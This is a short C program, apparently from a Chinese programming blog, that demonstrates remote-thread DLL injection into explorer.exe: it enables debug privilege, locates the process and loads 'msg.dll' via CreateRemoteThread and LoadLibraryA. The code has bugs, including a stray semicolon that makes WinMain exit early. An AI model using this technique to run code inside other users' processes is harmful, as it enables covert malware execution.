1. #include <Windows.h>
2. #include <tchar.h>
3. #include <TlHelp32.h>
4.
5. BOOL LoadRemoteDll(DWORD dwProcessId,LPTSTR lpszLibName);
6. DWORD EnablePrivilege (PCSTR name);
7. BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID);
8.
9. DWORD EnablePrivilege (PCSTR name)
10. {
11. HANDLE hToken;
12. BOOL rv;
13. TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
14. LookupPrivilegeValue (
15. 0,
16. name,
17. &priv.Privileges[0].Luid
18. );
19. OpenProcessToken(
20. GetCurrentProcess (),
21. TOKEN_ADJUST_PRIVILEGES,
22. &hToken
23. );
24. AdjustTokenPrivileges (
25. hToken,
26. FALSE,
27. &priv,
28. sizeof priv,
29. 0,
30. 0
31. );
32. rv = GetLastError();
33. CloseHandle (hToken);
34. return rv;
35. }
36.
37. BOOL GetProcessIdByName(LPSTR szProcessName, LPDWORD lpPID)
38. {
39. STARTUPINFO st;
40. PROCESS_INFORMATION pi;
41. PROCESSENTRY32 ps;
42. HANDLE hSnapshot;
43. ZeroMemory(&st, sizeof(STARTUPINFO));
44. ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
45. st.cb = sizeof(STARTUPINFO);
46. ZeroMemory(&ps,sizeof(PROCESSENTRY32));
47. ps.dwSize = sizeof(PROCESSENTRY32);
48.
49. hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0);
50. if(hSnapshot == INVALID_HANDLE_VALUE)
51. {
52. return FALSE;
53. }
54.
55. if(!Process32First(hSnapshot,&ps))
56. {
57. return FALSE;
58. }
59. do
60. {
61.
62. if(lstrcmpi(ps.szExeFile,"explorer.exe")==0)
63. {
64.
65. *lpPID = ps.th32ProcessID;
66. CloseHandle(hSnapshot);
67. return TRUE;
68. }
69. }
70. while(Process32Next(hSnapshot,&ps));
71.
72. CloseHandle(hSnapshot);
73. return FALSE;
74. }
75.
76. BOOL LoadRemoteDll(DWORD dwProcessId,LPTSTR lpszLibName){
77. BOOL bResult = FALSE;
78. HANDLE hProcess = NULL;
79. HANDLE hThread = NULL;
80. PSTR pszLibFileRemote = NULL;
81. DWORD cch;
82. PTHREAD_START_ROUTINE pfnThreadRtn;
83.
84. __try{
85. hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);
86. if(hProcess == NULL){
87. __leave;
88. }
89. cch = 1 + lstrlen(lpszLibName);
90. pszLibFileRemote = (PSTR)VirtualAllocEx(hProcess,NULL,cch,MEM_COMMIT,PAGE_READWRITE);
91. if(pszLibFileRemote == NULL){
92. __leave;
93. }
94. if(!WriteProcessMemory(hProcess,(LPVOID)pszLibFileRemote,(LPVOID)lpszLibName,cch,NULL)){
95. __leave;
96. }
97. pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),TEXT("LoadLibraryA"));
98. if(pfnThreadRtn == NULL){
99. __leave;
100. }
101. hThread = CreateRemoteThread(hProcess,NULL,0,pfnThreadRtn,(PVOID)pszLibFileRemote,0,NULL);
102. if(hThread == NULL){
103. __leave;
104. }
105. WaitForSingleObject(hThread,INFINITE);
106. bResult = TRUE;
107. }__finally{
108. if(pszLibFileRemote != NULL){
109. VirtualFreeEx(hProcess,(PVOID)pszLibFileRemote,0,MEM_RELEASE);
110. }
111. if(hThread != NULL){
112. CloseHandle(hThread);
113. }
114. if(hProcess != NULL){
115. CloseHandle(hProcess);
116. }
117. }
118. return bResult;
119.}
120.
121.int WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine,int nCmdShow){
122. DWORD dwPID;
123. if(0!=EnablePrivilege(SE_DEBUG_NAME));
124. return 0;
125. if(!GetProcessIdByName("explorer.exe",&dwPID))
126. return 0;
127. if(!LoadRemoteDll(dwPID,"msg.dll"))
128. return 0;
129.}
本文出自 “Pnig0s” 博客
